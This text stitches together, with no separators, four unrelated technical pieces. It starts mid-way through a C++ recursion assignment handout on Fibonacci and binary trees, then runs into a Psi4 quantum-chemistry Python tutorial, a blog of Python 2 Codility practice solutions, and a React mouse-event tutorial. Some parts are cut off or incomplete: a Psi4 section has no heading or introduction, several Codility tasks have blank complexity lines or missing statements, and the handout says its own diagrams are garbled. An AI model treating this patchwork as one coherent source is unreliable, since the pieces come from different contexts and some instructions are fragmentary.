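Note the pending `+` after each recursive call is exactly what disqualifies this version from being tail-recursive.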
The second must be tail-recursive and is tricky, but we've supplied a hint.

int fib(int n);
/*
// REQUIRES: n >= 0
// EFFECTS: computes the Nth Fibonacci number
//          fib(0) = 0
//          fib(1) = 1
//          fib(n) = fib(n-1) + fib(n-2) for (n>1).
//          This need not be tail recursive
*/

int fib_tail(int n);
/*
// REQUIRES: n >= 0
// EFFECTS: computes the Nth Fibonacci number
//          fib(0) = 0
//          fib(1) = 1
//          fib(n) = fib(n-1) + fib(n-2) for (n>1).
//          MUST be tail recursive
// Hint: instead of starting at n and working down, start with
//       0 and 1 and work *upwards*.
*/

Binary Trees

The Fibonacci numbers appear to be tree-recursive, but can be computed in a way that is linear-recursive. This is not true for all tree-recursive problems. For example, consider the following definition of a binary tree:

A binary tree is well formed if:
a) It is the empty tree, or
b) It consists of an integer element, plus two children, called the left subtree and the right subtree, each of which is a well-formed binary tree.

Additionally, we say a binary tree is a "leaf" if and only if both of its children are the EMPTY_TREE. The file recursive.h defines the type "tree_t" and the following operations on trees:

extern bool tree_isEmpty(tree_t tree);
// EFFECTS: returns true if tree is empty, false otherwise

extern tree_t tree_make();
// EFFECTS: creates an empty tree.

extern tree_t tree_make(int elt, tree_t left, tree_t right);
// EFFECTS: creates a new tree, with elt as its element, left as
//          its left subtree, and right as its right subtree

extern int tree_elt(tree_t tree);
// REQUIRES: tree is not empty
// EFFECTS: returns the element at the top of tree.

extern tree_t tree_left(tree_t tree);
// REQUIRES: tree is not empty
// EFFECTS: returns the left subtree of tree

extern tree_t tree_right(tree_t tree);
// REQUIRES: tree is not empty
// EFFECTS: returns the right subtree of tree

extern void tree_print(tree_t tree);
// MODIFIES: cout
// EFFECTS: prints tree to cout.
// Note: this uses a non-intuitive, but easy-to-print
//       format.

There are four functions you are to write for binary trees. These must be recursive, and cannot use any looping structures. They do not need to be tail-recursive.

int tree_sum(tree_t tree);
// EFFECTS: returns the sum of all elements in the tree,
//          zero if the tree is empty

list_t traversal(tree_t tree);
/*
// EFFECTS: returns the elements of tree in a list using an
//          in-order traversal. An in-order traversal yields a
//          list with the "left most" element first, then the
//          second-left-most, and so on, with the right-most
//          element last.
//
//          For example, the tree:
//
//               4
//              / \
//             2   5
//              \
//               3
//
//          would return the list ( 2 3 4 5 )
//
//          An empty tree would print as: ( )
*/

We can define a special relation between trees, "is covered by", as follows:
An empty tree is covered by all trees.
The empty tree covers only other empty trees.
For any two non-empty trees, A and B, A is covered by B if and only if the top-most elements of A and B are equal, the left subtree of A is covered by the left subtree of B, and the right subtree of A is covered by the right subtree of B.

For example, the tree:

     4
    / \
   2   5
    \
     3

covers the tree:

     4
    /
   2

but not the trees:

   4
  /    or    5
 3

In light of this definition, write the following function:

bool contained_by(tree_t A, tree_t B);
/*
// EFFECTS: returns true if A is covered by B, or any complete
//          subtree of B.
*/

You need not explicitly write covered_by, but we recommend it, as it is likely to make your solution simpler overall to separate it. In other words, the trees

   4
  /    and    5
 2

are contained by the tree

     4
    / \
   2   5
    \
     3

but this tree is not:

   4
  /
 3

There exists a special kind of binary tree, called the sorted binary tree. A sorted binary tree is well-formed if:

1. It is a well-formed binary tree and
2. One of the following is true:
   a. The tree is empty
   b.
The left subtree is a sorted binary tree, and any elements in the left subtree are strictly less than the top element of the tree,
      - AND -
      the right subtree is a sorted binary tree, and any elements in the right subtree are greater than or equal to the top element of the tree.

For example, the original handout shows several well-formed sorted binary trees, along with several trees that are not sorted binary trees (the diagrams are garbled in this transcription).

You are to write the following function for creating sorted binary trees:

tree_t insert_tree(int elt, tree_t tree);
/*
// REQUIRES: tree is a sorted binary tree
// EFFECTS: returns a new tree with elt inserted at a leaf
//          such that the resulting tree is also a sorted
//          binary tree.
//
//          For example, inserting 1 into the tree:
//
//               4
//              / \
//             2   5
//              \
//               3
//
//          would yield the tree:
//
//               4
//              / \
//             2   5
//            / \
//           1   3
//
// Hint: an in-order traversal of a sorted binary tree is always
//       a sorted list, and there is only one unique location for
//       any element to be inserted.
*/

Files

There are several files installed in the directory: /afs/umich.edu/class/eecs280/proj2

p2.h            the header file for the functions you must write
recursive.h     the list_t and tree_t interfaces
recursive.cpp   the implementations of list_t and tree_t

You should put all of the functions you write in a single file, called p2.cpp. You may use only the C++ standard and iostream libraries, and no others. You may use assert() if you wish, but you do not need to. You may not use global variables. You can think of p2.cpp as providing a library of functions that other programs might use, just as recursive.cpp does. DO NOT INCLUDE a main function in your p2.cpp file. We will provide this function when using your code as a library to test your functions. To test your code, you should create a family of test case programs that exercise these functions.
We have placed a handful of test cases in /afs/umich.edu/class/eecs280/proj2. Here is a simple one to get you started.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
#include <iostream>
#include "p2.h"
using namespace std;

int main() {
    int i;
    list_t listA;
    list_t listB;
    listA = list_make();
    listB = list_make();
    for (i = 5; i > 0; i--) {
        listA = list_make(i, listA);
        listB = list_make(i+10, listB);
    }
    list_print(listA); cout << endl;
    list_print(listB); cout << endl;
    list_print(reverse(listA)); cout << endl;
    list_print(append(listA, listB)); cout << endl;
}
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Here is how to build this test case, called simple_test.cpp, into a program, given your own implementation of p2.cpp plus our implementation of recursive.cpp:

g++ -O1 -Wall -Werror -o simple_test simple_test.cpp p2.cpp recursive.cpp

Note the O1 flag (capital O, not zero), just as we used in Project 1. It enables the compiler's detection of uninitialized variables, but should not be used if you are compiling for debugging. When you run it, this is the output you should see:

./simple_test
( 1 2 3 4 5 )
( 11 12 13 14 15 )
( 5 4 3 2 1 )
( 1 2 3 4 5 11 12 13 14 15 )

We have provided two more test cases for you to try out. These two are self-verifying (they tell you if they succeeded or failed).

Handing in and grading

You should hand in your program, p2.cpp, via submit280 before the deadline. See CTools for more information on submit280. Your program will be graded along three criteria:

1) Functional Correctness
2) Implementation Constraints
3) General Style

An example of Functional Correctness is whether or not your reverse function reverses a list properly in all cases. An example of an Implementation Constraint is whether reverse() is tail-recursive. General Style speaks to the cleanliness and readability of your code.

Spring '08, NOBLE
PsiAPI Tutorial: Using Psi4 as a Python Module¶

transcribed by D. A. Sirianni

Psi4 can be run in two modes. In Psithon mode, you write an input file in Psi4's Psithon dialect (e.g., psi4.in), then submit it to the executable psi4, which processes the Psithon into pure Python and runs it internally. In PsiAPI mode, you write a pure Python script with import psi4 at the top and commands behind the psi4. namespace, then submit it to the python interpreter. Both modes are equally powerful. This tutorial covers the PsiAPI mode.

Warning: Although the developers have been using PsiAPI mode stably for months before the 1.1 release, and while we believe we've gotten everything nicely arranged within the psi4. namespace, the API should not be considered completely stable. Most importantly, as we someday deprecate the last of the global variables, options will be added to the method calls (e.g., energy('scf', molecule=mol, options=opt)).

Note: Consult How to run Psi4 as Python module after compilation or How to run Psi4 as a Python module from conda installation for assistance in setting up Psi4.

Unlike in the past, where Psi4 was executable software which could only be called via input files like input.dat, it is now interactive, able to be loaded directly as a Python module. Here, we will explore the basics of using Psi4 in this new style by reproducing the section A Psi4 Tutorial from the Psi4 manual in an interactive Jupyter Notebook.

Note: If the newest version of Psi4 (v.1.1a2dev42 or newer) is in your path, feel free to execute each cell as you read along by pressing Shift+Enter when the cell is selected.

I.
Basic Input Structure¶

Psi4 is now a Python module; so, we need to import it into our Python environment:

[1]:
import psi4

Psi4 is now able to be controlled directly from Python. By default, Psi4 will print any output to the screen; this can be changed by giving a file name (with path if not in the current working directory) to the function psi4.core.set_output_file() API, as a string:

[2]:
psi4.core.set_output_file('output.dat', False)

Additionally, output may be suppressed by instead calling psi4.core.be_quiet() API.

II. Running a Basic Hartree-Fock Calculation¶

In our first example, we will consider a Hartree-Fock SCF computation for the water molecule using a cc-pVDZ basis set. First, we will set the available memory for Psi4 to use with the psi4.set_memory() API function, which takes either a string like '30 GB' (with units!) or an integer number of bytes of memory as its argument. Next, our molecular geometry is passed as a string into psi4.geometry() API. We may input this geometry in either Z-matrix or Cartesian format; to allow the string to break over multiple lines, use Python's triple-quote """string""" syntax. Finally, we will compute the Hartree-Fock SCF energy with the cc-pVDZ basis set by passing the method/basis set as a string ('scf/cc-pvdz') into the function psi4.energy() API:

[3]:
#! Sample HF/cc-pVDZ H2O Computation
psi4.set_memory('500 MB')

h2o = psi4.geometry("""
O
H 1 0.96
H 1 0.96 2 104.5
""")

psi4.energy('scf/cc-pvdz')

[3]:
-76.02663273488399

If everything goes well, the computation should complete and should report a final restricted Hartree-Fock energy in the output file output.dat in a section like this:

Energy converged.
@DF-RHF Final Energy: -76.02663273486682

(The last few digits may differ slightly from the value returned above, depending on how your copy of Psi4 was built; see the main Psi4 manual section Compiling and Installing from Source.)

This very simple input is sufficient to run the requested computation. Notice we didn't tell the program some otherwise useful information, like the charge of the molecule or whether the electrons are paired; by default, Psi4 assumes a neutral, closed-shell molecule. For example, let's run a computation on methylene (\(\text{CH}_2\)), with the bond length and angle first stored and then inserted into the geometry specification using Python 3 string formatting.

[4]:
#! Sample UHF/6-31G** CH2 Computation
R = 1.075
A = 133.93

ch2 = psi4.geometry("""
0 3
C
H 1 {0}
H 1 {0} 2 {1}
""".format(R, A)
)

psi4.set_options({'reference': 'uhf'})
psi4.energy('scf/6-31g**')

[4]:
-38.925334628859886

Executing this cell should yield the final energy as

@DF-UHF Final Energy: -38.92533462887677

Notice the new command, psi4.set_options() API, in the input. This function takes a Python dictionary as its argument: a key-value mapping which associates a Psi4 keyword with its user-defined value.

III. Geometry Optimization and Vibrational Frequency Analysis¶

The above examples were simple single-point energy computations (as specified by the psi4.energy() API function). Of course there are other kinds of computations to perform, such as geometry optimizations and vibrational frequency computations. These can be specified by replacing psi4.energy() API with psi4.optimize() API or psi4.frequency() API, respectively. Let's take a look at an example of optimizing the H\(_2\)O molecule using Hartree-Fock with a cc-pVDZ basis set.

Now, here comes the real beauty of running Psi4 interactively: above, when we computed the energy of H\(_2\)O with HF/cc-pVDZ, we defined the Psi4 molecule object h2o.
Since we're still in the Python shell, as long as you executed that block of code, we can reuse the h2o molecule object in our optimization without redefining it, by adding the molecule=h2o argument to the psi4.optimize() API function:

[5]:
psi4.set_options({'reference': 'rhf'})
psi4.optimize('scf/cc-pvdz', molecule=h2o)

Optimizer: Optimization complete!

[5]:
-76.02703272937504

This should perform a series of gradient computations. The gradient points which way is downhill in energy, and the optimizer then modifies the geometry to follow the gradient. After a few cycles, the geometry should converge with the message "Optimizer: Optimization complete!", and the output file records a summary of each optimization step:

Step    Total Energy        Delta E            MAX Force    RMS Force    MAX Disp     RMS Disp
   1   -76.026632734908   -76.026632734908    0.01523518   0.01245755   0.02742222   0.02277530
   2   -76.027022666011    -0.000389931104    0.00178779   0.00142946   0.01008137   0.00594928
   3   -76.027032729374    -0.000010063363    0.00014019   0.00008488   0.00077463   0.00044738

To get harmonic vibrational frequencies, it's important to keep in mind that the values of the vibrational frequencies are a function of the molecular geometry. Therefore, it's important to obtain the vibrational frequencies AT THE OPTIMIZED GEOMETRY. Luckily, Psi4 updates the molecule with the optimized geometry as it is being optimized. So, the optimized geometry for H\(_2\)O is stored inside the h2o molecule object, which we can access! To compute the frequencies, all we need to do is to again pass the molecule=h2o argument to the psi4.frequency() API function:

[6]:
scf_e, scf_wfn = psi4.frequency('scf/cc-pvdz', molecule=h2o, return_wfn=True, dertype=1)

6 displacements needed.
1 2 3 4 5 6

Executing this cell will prompt Psi4 to compute the Hessian (second derivative matrix) of the electronic energy with respect to nuclear displacements. From this, it can obtain the harmonic vibrational frequencies, given below (roundoff errors of around \(0.1\) cm\(^{-1}\) may exist):

Irrep   Harmonic Frequency (cm-1)
-----------------------------------------------
 A1          1775.6478
 A1          4113.3795
 B2          4212.1814
-----------------------------------------------

Notice the symmetry type of the normal modes is specified (A1, A1, B2). The program also prints out the normal modes in terms of Cartesian coordinates of each atom. For example, the normal mode at \(1776\) cm\(^{-1}\) is:

Frequency:      1775.65
Force constant: 0.1193
        X       Y       Z        mass
O   0.000   0.000  -0.068   15.994915
H   0.000   0.416   0.536    1.007825
H   0.000  -0.416   0.536    1.007825

These details all appear in output.dat. The vibrational frequencies are sufficient to obtain vibrational contributions to enthalpy (H), entropy (S), and Gibbs free energy (G). Similarly, the molecular geometry is used to obtain rotational constants, which are then used to obtain rotational contributions to H, S, and G.

Note: Psi4 has several synonyms for the functions called in this example. For instance, psi4.frequency() API will compute molecular vibrational frequencies, and psi4.optimize() API will perform a geometry optimization.

IV.

[7]:
# Example SAPT computation for ethene*ethyne (*i.e.*, ethylene*acetylene).
# Test case 16 from S22 Database
dimer = psi4.geometry("""
0 1
C   0.000000  -0.667578  -2.124659
C   0.000000   0.667578  -2.124659
H   0.923621  -1.232253  -2.126185
H  -0.923621  -1.232253  -2.126185
H  -0.923621   1.232253  -2.126185
H   0.923621   1.232253  -2.126185
--
0 1
C   0.000000   0.000000   2.900503
C   0.000000   0.000000   1.693240
H   0.000000   0.000000   0.627352
H   0.000000   0.000000   3.963929
units angstrom
""")

Here's the second half of the input, where we specify the computation options:

[8]:
psi4.set_options({'scf_type': 'df', 'freeze_core': 'true'})
psi4.energy('sapt0/jun-cc-pvdz', molecule=dimer)

[8]:
-0.0022355825227244703

All of the options we have currently set using psi4.set_options() API are "global" options (meaning that they are visible to all parts of the program). Most common Psi4 options can be set like this. If an option needs to be visible only to one part of the program (e.g., we only want to increase the energy convergence in the SCF code, but not the rest of the code), it can be set with the psi4.set_module_options() API function, e.g., psi4.set_module_options('scf', {'e_convergence': '1e-8'}).

Note: The arguments to the functions we've used so far, like psi4.set_options() API, psi4.set_module_options() API, psi4.energy() API, psi4.optimize() API, psi4.frequency() API, etc., are case-insensitive.

In this example, we request a density-fitted SCF algorithm by adding 'scf_type': 'df' to the dictionary passed to psi4.set_options(), and we freeze the core electrons by adding 'freeze_core': 'true' to the dictionary passed to psi4.set_options(). The SAPT procedure is invoked by psi4.energy('sapt0/jun-cc-pvdz', molecule=dimer), which decomposes the interaction energy into physically meaningful components. The largest attractive contribution is the electrostatics term, Elst10,r (where the 1 indicates the first-order perturbation theory result with respect to the intermolecular interaction, and the 0 indicates zeroth-order with respect to the intramolecular electron correlation).
The next most attractive contribution is the Disp20 term (second-order intermolecular dispersion, which looks like MP2 in which one excitation is placed on each monomer), contributing an attraction of \(-1.21\) kcal/mol.

V. Potential Surface Scans and Counterpoise Correction Made Easy¶

Finally, let's consider an example which highlights the advantages of being able to interact with Psi4 directly with Python. Suppose you want to do a limited potential energy surface scan, such as computing the interaction energy between two neon atoms at various interatomic distances. One simple but unappealing way to do this is to generate separate geometries for each distance to be studied. Instead, we can leverage Python loops and string formatting to make our lives simpler. Additionally, let's counterpoise-correct the interaction energies; recall that a double dash in the psi4.geometry() string can be used to separate monomers. So, we're going to do counterpoise-corrected CCSD(T) energies for Ne\(_2\) at a series of different interatomic distances. And let's print out a table of the interatomic distances we've considered, and the CP-corrected CCSD(T) interaction energies (in kcal/mol) at each geometry:

[9]: #!
Example potential energy surface scan and CP-correction for Ne2

ne2_geometry = """
Ne
--
Ne 1 {0}
"""

Rvals = [2.5, 3.0, 4.0]

psi4.set_options({'freeze_core': 'true'})

# Initialize a blank dictionary of counterpoise corrected energies
# (Need this for the syntax below to work)
ecp = {}

for R in Rvals:
    ne2 = psi4.geometry(ne2_geometry.format(R))
    ecp[R] = psi4.energy('ccsd(t)/aug-cc-pvdz', bsse_type='cp', molecule=ne2)

# Prints to screen
print("CP-corrected CCSD(T)/aug-cc-pVDZ Interaction Energies\n\n")
print("          R [Ang]         E_int [kcal/mol]  ")
print("---------------------------------------------------------")
for R in Rvals:
    e = ecp[R] * psi4.constants.hartree2kcalmol
    print("          {:3.1f}             {:1.6f}".format(R, e))

# Prints to output.dat
psi4.core.print_out("CP-corrected CCSD(T)/aug-cc-pVDZ Interaction Energies\n\n")
psi4.core.print_out("          R [Ang]         E_int [kcal/mol]  \n")
psi4.core.print_out("---------------------------------------------------------\n")
for R in Rvals:
    e = ecp[R] * psi4.constants.hartree2kcalmol
    psi4.core.print_out("          {:3.1f}             {:1.6f}\n".format(R, e))

CP-corrected CCSD(T)/aug-cc-pVDZ Interaction Energies

          R [Ang]         E_int [kcal/mol]
---------------------------------------------------------
          2.5              0.758605
          3.0              0.015968
          4.0             -0.016215

First, you can see the geometry string ne2_geometry has two dashes to separate the monomers from each other. Also note we've used a Z-matrix to specify the geometry, and we've used a variable (R) as the interatomic distance. We have not specified the value of R in the ne2_geometry string like we normally would. That's because we are going to vary it during the scan across the potential energy surface, by using a Python loop over the list of interatomic distances Rvals. Before we are able to pass our molecule to Psi4, we need to do two things. First, we must set the value of the intermolecular separation in our Z-matrix (by using Python 3 string formatting) to the particular value of R.
Second, we need to turn the Z-matrix string into a Psi4 molecule, by passing it to psi4.geometry(). The argument bsse_type='cp' tells Psi4 to perform counterpoise (CP) correction on the dimer to compute the CCSD(T)/aug-cc-pVDZ interaction energy, which is stored in our ecp dictionary at each iteration of our Python loop. Note that we didn't need to specify ghost atoms, and we didn't need to call the monomer and dimer computations separately. Psi4 does it all for us, automatically.

Near the very end of the output file output.dat, you will find a summary of the n-body computations like this:

N-Body: Computing complex (1/2) with fragments (2,) in the basis of fragments (1, 2).
...
N-Body: Complex Energy (fragments = (2,), basis = (1, 2): -128.70932405488924)
...
N-Body: Computing complex (2/2) with fragments (1,) in the basis of fragments (1, 2).
...
N-Body: Complex Energy (fragments = (1,), basis = (1, 2): -128.70932405488935)
...
N-Body: Computing complex (1/1) with fragments (1, 2) in the basis of fragments (1, 2).
...
N-Body: Complex Energy (fragments = (1, 2), basis = (1, 2): -257.41867403127321)
...
==> N-Body: Counterpoise Corrected (CP) energies <==

   n-Body     Total Energy [Eh]       I.E. [kcal/mol]      Delta [kcal/mol]
        1     -257.418648109779        0.000000000000        0.000000000000
        2     -257.418674031273       -0.016265984132       -0.016265984132

And that's it! The only remaining part of the example is a little table of the different R values and the CP-corrected CCSD(T) energies, converted from atomic units (Hartree) to kcal mol\(^{-1}\) by multiplying by the automatically-defined conversion factor psi4.constants.hartree2kcalmol. Psi4 provides several built-in physical constants and conversion factors, as described in the Psi4 manual section Physical Constants. The table can be printed either to the screen, by using standard Python print() syntax, or to the designated output file output.dat using Psi4's built-in function psi4.core.print_out() API (C style printing).
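Since psi4.constants.hartree2kcalmol is just a float, the conversion-and-formatting step can be exercised without Psi4 installed at all. A standalone sketch, with the constant hard-coded as an assumption standing in for the Psi4-provided one:

```python
HARTREE2KCALMOL = 627.5094740631  # stand-in for psi4.constants.hartree2kcalmol

def table_row(r_ang, e_hartree):
    # Convert an interaction energy from Hartree to kcal/mol and
    # format one row the way the tutorial's print loop does.
    e = e_hartree * HARTREE2KCALMOL
    return "  {:3.1f}    {:1.6f}".format(r_ang, e)

print(table_row(3.0, 2.5447e-05))  # roughly the tutorial's 0.015968 row
```

The helper name table_row is illustrative only; the tutorial inlines this logic in its loop.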
As we've seen so far, the combination of Psi4 and Python creates a unique, interactive approach to quantum chemistry. The next section will explore this synergistic relationship in greater detail, describing how even very complex tasks can be done very easily with Psi4.
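As a coda, the template-plus-loop scan pattern at the heart of the last example is independent of Psi4 itself. Here is a minimal pure-Python sketch in which a placeholder function stands in for psi4.energy() (the names fake_energy and results are illustrative, not Psi4 API):

```python
ne2_template = """
Ne
--
Ne 1 {0}
"""

def fake_energy(geometry):
    # Stand-in for psi4.energy(): just echoes the separation it
    # finds at the end of the geometry string, negated.
    return -float(geometry.split()[-1])

results = {}
for R in [2.5, 3.0, 4.0]:
    geom = ne2_template.format(R)  # substitute this separation
    results[R] = fake_energy(geom)

print(results)  # {2.5: -2.5, 3.0: -3.0, 4.0: -4.0}
```

Swapping fake_energy for a real psi4.energy() call (and the template for any Z-matrix) reproduces the tutorial's scan.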
What follows are my solutions to Codility sample tasks. I made lots of both serious and stupid mistakes getting to decent solutions, and my first submits were just sad. For the first one, I forgot to return $-1$ in the case where there is no equilibrium index. For the second (this one took me the longest), I had forgotten I had to uncount repeated cases and returned the exception case way too early. I also did not know how to run binary searches using Python (at least now I know). For the third, the easiest of them all, I was using a list instead of a dictionary as a checked bag and thus spending too much time asking if an element had been checked already while iterating over the list. I felt that the expected complexity requirements for each problem end up giving away too much information about the nature of the solutions.

Note: Initially I only had the solution for three problems. I've continued practicing and I'll be adding solutions here as I go over each problem.

A zero-indexed array $A$ consisting of $N$ integers is given. An equilibrium index of this array is any integer $P$ such that $0 \leq P < N$ and the sum of elements of lower indices is equal to the sum of elements of higher indices, i.e.

$$A[0] + A[1] + \cdots + A[P−1] = A[P+1] + \cdots + A[N−2] + A[N−1].$$

Sum of zero elements is assumed to be equal to $0$. This can happen if $P = 0$ or if $P = N−1$. Write a function

def solution(A)

that, given a zero-indexed array $A$ consisting of $N$ integers, returns any of its equilibrium indices. The function should return $−1$ if no equilibrium index exists.

Complexity:

def solution(A):
    uppersum = sum(A)
    lowersum = 0
    term = 0
    for i, x in enumerate(A):
        lowersum += term
        term = x
        uppersum -= term
        if lowersum == uppersum:
            return i
    return -1

Given an array $A$ of $N$ integers, we draw $N$ discs in a 2D plane such that the $I$-th disc is centered on $(0,I)$ and has a radius of $A[I]$.
We say that the $J$-th disc and $K$-th disc intersect if $J \neq K$ and the $J$-th and $K$-th discs have at least one common point. Write a function

def solution(A)

that, given an array $A$ describing $N$ discs as explained above, returns the number of pairs of intersecting discs. The function should return $−1$ if the number of intersecting pairs exceeds $10^7$.

Complexity:

from bisect import bisect_right

def solution(A):
    n = len(A)
    upper = sorted([i + x for i, x in enumerate(A)])
    lower = sorted([i - x for i, x in enumerate(A)])
    counter = 0
    for v in upper:
        counter += bisect_right(lower, v)
    counter -= n * (n + 1) / 2
    if counter > 1e7:
        return -1
    return counter

A non-empty zero-indexed array $A$ consisting of $N$ integers is given. The first covering prefix of array $A$ is the smallest integer $P$ such that $0 \leq P < N$ and such that every value that occurs in array $A$ also occurs in sequence $A[0], A[1], \ldots, A[P]$. Write a function

def solution(A)

that, given a zero-indexed non-empty array $A$ consisting of $N$ integers, returns the first covering prefix of $A$.

Complexity:

def solution(A):
    checked = {}
    r = 0
    for i, x in enumerate(A):
        if not x in checked:
            checked[x] = True
            r = i
    return r

A binary gap within a positive integer $N$ is any maximal sequence of consecutive zeros that is surrounded by ones at both ends in the binary representation of $N$. Write a function

def solution(N)

that, given a positive integer $N$, returns the length of its longest binary gap. The function should return $0$ if $N$ doesn't contain a binary gap.

def solution(N):
    zeros = bin(N)[2:].split('1')
    zeros = zeros[:-1]  # Just in case there are trailing zeros
    return max(map(len, zeros))

Complexity:

# This one is silly:
def solution(X, Y, D):
    distance = Y - X
    if distance % D == 0:
        return (Y - X) / D
    else:
        return ((Y - X) / D) + 1  # Abusing Python's broken division.
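The division joke above relies on Python 2's floor-dividing /. A Python 3-safe variant of the same idea (the helper name frog_jumps is mine, not part of the original solutions) gets the ceiling without floats or branching by negating twice:

```python
def frog_jumps(X, Y, D):
    # ceil((Y - X) / D) via floor division:
    # for positive D, -(-a // D) == ceil(a / D).
    return -(-(Y - X) // D)

print(frog_jumps(10, 85, 30))  # 3 jumps: 10 -> 40 -> 70 -> 100
```

This works identically in Python 2 and 3, since // floors in both.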
The array contains integers in the range $[1\ldots(N + 1)]$, which means that exactly one element is missing. Your goal is to find that missing element. Write a function

def solution(A)

that, given a zero-indexed array $A$, returns the value of the missing element.

Complexity:

def solution(A):
    # The complexity is O(N log(N)), unfortunately. But Codility wasn't able to tell.
    A = sorted(A)
    for i in range(len(A)):
        if A[i] != i + 1:
            return i + 1
    return len(A) + 1

A non-empty zero-indexed array $A$ consisting of $N$ integers is given. A permutation is a sequence containing each element from $1$ to $N$ once, and only once. The goal is to check whether array $A$ is a permutation. Write a function

def solution(A)

that, given a zero-indexed array $A$, returns $1$ if array $A$ is a permutation and $0$ if it is not.

Complexity:

def solution(A):
    n = len(A)
    check = {i + 1: False for i in xrange(n)}
    for x in A:
        if x not in check:
            return 0
        else:
            if check[x] == True:
                return 0
            else:
                check[x] = True
    for x in check:
        if check[x] == False:
            return 0
    return 1

Write a function

def solution(A)

that, given a zero-indexed array $A$ consisting of $N$ integers, returns the number of distinct values in array $A$.

Complexity:

# Minimal solution
# A detailed version would require ordering the array
# and running over it while counting the times the value changes.
# (Which I guess is more or less the way Python turns a list into a set.)
def solution(A):
    return len(set(A))

A string $S$ consisting of $N$ characters is called properly nested if: $S$ is empty; or $S$ has the form "(U)" where $U$ is a properly nested string; or $S$ has the form "VW" where $V$ and $W$ are properly nested strings. Write a function

def solution(S)

that, given a string $S$ consisting of $N$ characters, returns $1$ if string $S$ is properly nested and $0$ otherwise.

Complexity:

def solution(S):
    stack = 0
    for x in S:
        if x == '(':
            stack += 1
        if x == ')':
            stack -= 1
        if stack < 0:
            return 0
    if stack == 0:
        return 1
    else:
        return 0

You are given two non-empty zero-indexed arrays $A$ and $B$ consisting of $N$ integers, representing $N$ fish: $A$ contains the fish sizes and $B$ their directions ($0$s and/or $1$s), where $0$ represents a fish flowing upstream and $1$ a fish flowing downstream. We assume that all the fish are flowing at the same speed. That is, fish moving in the same direction never meet.
The goal is to calculate the number of fish that will stay alive. Write a function

def solution(A, B)

that, given two non-empty zero-indexed arrays $A$ and $B$ consisting of $N$ integers, returns the number of fish that will stay alive.

Complexity:

# First time I got 100% with my first submit.
def solution(A, B):
    fish_downstream = []
    up_survivors = 0
    for i, direction in enumerate(B):
        if direction == 1:
            fish_downstream.append(A[i])
        else:
            is_active = 1
            up = A[i]
            while is_active:
                if len(fish_downstream) != 0:
                    down = fish_downstream.pop()
                    if down > up:
                        fish_downstream.append(down)
                        is_active = 0
                else:
                    is_active = 0
                    up_survivors += 1
    return len(fish_downstream) + up_survivors

You have to climb up a ladder. The ladder has exactly $N$ rungs, numbered from $1$ to $N$. With each step, you can ascend by one or two rungs. Your task is to count the number of different ways of climbing to the top of the ladder. Write a function

def solution(A, B)

that, given two non-empty zero-indexed arrays $A$ and $B$ of $L$ integers, returns an array consisting of $L$ integers specifying the consecutive answers; position $I$ should contain the number of different ways of climbing the ladder with $A[I]$ rungs modulo $2^{B[I]}$.

Complexity:

def count_down(n, dicc):
    for m in [1, 2]:
        if n - m in dicc:
            dicc[n] = dicc.get(n, 0) + dicc[n - m]
    return dicc

def climbing_ways_counter(L):
    dicc = {0: 1}
    for n in xrange(L):
        count_down(n, dicc)
    return dicc

def solution(A, B):
    L = len(A) + 1
    # Weird optimization trick. Modulo operation is too slow...
    # Had to look up online for it:
    B = [(1 << b) - 1 for b in B]
    d = climbing_ways_counter(L)
    return [d[a] & b for a, b in zip(A, B)]
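The ladder recurrence the memoized solution builds, ways(n) = ways(n-1) + ways(n-2) with ways(0) = ways(1) = 1, is just the Fibonacci sequence shifted by one. A standalone sanity check of that fact (independent of the code above; the helper name ways is mine):

```python
def ways(n):
    # Number of ways to climb n rungs taking steps of 1 or 2,
    # computed iteratively.
    a, b = 1, 1  # ways(0), ways(1)
    for _ in range(n):
        a, b = b, a + b
    return a

print([ways(n) for n in range(6)])  # [1, 1, 2, 3, 5, 8]
```

Masking the result with (1 << b) - 1 then gives ways(n) mod 2**b, exactly as in the solution above.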
How to add onMouseEnter or onMouseOver in ReactJS

You need an event when a user's mouse hovers over an HTML element or React component. So you run into onMouseOver and onMouseEnter. They both behave the same, so which one is the right one for you?

The difference between mouseover and mouseenter

Both of these events behave the same way: when the user's mouse enters an element, they both get triggered.

<style>
  #my_div {
    height: 120px;
    width: 120px;
    background-color: #333;
  }
</style>

<div id="my_div"></div>

<script>
  const divEl = document.querySelector('#my_div');

  divEl.addEventListener('mouseenter', () => console.log('Event: mouseenter'));
  divEl.addEventListener('mouseover', () => console.log('Event: mouseover'));
</script>

The output should look like this when you hover over the box.

Event: mouseover
Event: mouseenter
Event: mouseover
Event: mouseenter

The difference between mouseenter and mouseover shows up when child elements are placed inside the targeted element. I'm going to update the HTML template and update the styles.

<style>
  #my_div {
    height: 120px;
    width: 120px;
    background-color: #333;
    display: flex;
    align-items: center;
    justify-content: center;
  }
  #my_div > div {
    height: 50px;
    width: 50px;
    background-color: #ccc;
  }
</style>

<div id="my_div">
  <div></div>
</div>

You should have a smaller box in the center of the #my_div element. When you hover all the way to the middle, and then hover out of all the boxes, you should see the following output.

Event: mouseover
Event: mouseenter
Event: mouseover
Event: mouseover

mouseover gets triggered multiple times. That's because it gets triggered when the mouse hovers over the selected element OR its child elements.

Okay, let's implement this in a React component now.

React onMouseEnter and onMouseOver examples

The goal in this example is to make .innerBox appear and disappear when triggering one of these events. Both will have the same CSS.
.container, .wrapper {
  display: flex;
  justify-content: center;
  align-items: center;
}

.container {
  width: 200px;
  height: 200px;
  background-color: #ccc;
  margin: 60px auto 0;
  display: flex;
}

.wrapper {
  height: 150px;
  width: 150px;
  background-color: #666;
}

.innerBox {
  width: 80px;
  height: 80px;
  padding: 8px;
  background-color: #222;
  display: none;
}

.container.show .innerBox {
  display: block;
}

React onMouseEnter example

To add a mouseenter event listener in React, pass your event handler function to the onMouseEnter prop.

class App extends React.Component {
  state = { showBox: false };

  handleBoxToggle = () => this.setState({ showBox: !this.state.showBox });

  render() {
    return (
      <div
        onMouseEnter={this.handleBoxToggle}
        className={`container${this.state.showBox ? " show" : ""}`}
      >
        <div className="wrapper">
          <div className="innerBox" />
        </div>
      </div>
    );
  }
}

As soon as you hover over the .container element, it will make .innerBox appear.

React onMouseOver example

To add a mouseover event, swap out onMouseEnter for onMouseOver.

<div
  onMouseOver={this.handleBoxToggle}
  className={`container${this.state.showBox ? " show" : ""}`}
>
  <div className="wrapper">
    <div className="innerBox" />
  </div>
</div>

When you hover over .container, .innerBox will appear. But .innerBox will disappear when you hover the mouse over .wrapper, because .wrapper is an inner child element of .container, so it triggers the toggle method a second time.

